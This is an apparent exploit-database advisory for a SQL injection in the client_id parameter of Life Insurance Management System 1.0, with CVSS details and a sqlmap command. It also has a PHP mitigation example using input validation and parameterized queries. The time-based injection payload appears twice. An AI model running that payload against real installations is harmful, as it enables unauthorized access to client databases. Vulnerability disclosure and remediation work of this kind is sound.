Vendor: Life Insurance Management System
By: Aitor Herrero
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Life Insurance Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:life_insurance_management_system
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows, Linux
Year: 2021

Life Insurance Management System 1.0 – ‘client_id’ SQL Injection

Log in to the application, go to clientStatus.php?client_id=, and use sqlmap -u "http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1" to exploit the vulnerability.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
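
One way to apply this mitigation to a client_id lookup, as an added example that is not the application's own code. The table and column names, the digits-only id format and the in-memory SQLite database (standing in for the application's database) are assumptions; it needs PHP 8 with pdo_sqlite.

```php
<?php
declare(strict_types=1);

// Constructed demo database: in-memory SQLite stands in for the application's
// database; the table and column names are hypothetical.
function demoDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE client (client_id TEXT PRIMARY KEY, name TEXT)');
    $pdo->exec("INSERT INTO client VALUES ('1511986129', 'Sample Client')");
    return $pdo;
}

// Validation: accept only a short run of digits (assumed id format) and
// reject everything else before it reaches the database layer.
function parseClientId(mixed $raw): ?string
{
    if (!is_string($raw) || preg_match('/\A[0-9]{1,20}\z/', $raw) !== 1) {
        return null;
    }
    return $raw;
}

// Parameterized lookup: the value is bound as data and never concatenated
// into the SQL text, so quotes inside it cannot change the statement.
function findClient(PDO $pdo, string $clientId): ?array
{
    $stmt = $pdo->prepare('SELECT client_id, name FROM client WHERE client_id = :id');
    $stmt->execute([':id' => $clientId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = demoDb();
$inputs = [
    '1511986129',                            // legitimate id
    "1511986129' and sleep(20) and '1'='1",  // value from the report, URL-decoded
];
foreach ($inputs as $raw) {
    $id = parseClientId($raw);
    if ($id === null) {
        echo 'rejected (respond with HTTP 400): ', json_encode($raw), PHP_EOL;
        continue;
    }
    echo 'lookup: ', json_encode(findClient($pdo, $id)), PHP_EOL;
}
// Defence in depth: the same value bound without validation is compared as a literal string.
echo 'bound without validation: ', json_encode(findClient($pdo, $inputs[1])), PHP_EOL;
```

Validation gives an early, loggable rejection; the bound parameter is what keeps the query structure fixed if validation is ever skipped or loosened.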

Exploit-DB raw data:

# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection
# Date: 15/1/2021
# Exploit Author: Aitor Herrero
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
# Version: 1.0
# Tested on: Windows / Linux

Log in to the application

Go to clientStatus.php?client_id=

sqlmap -u "http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1"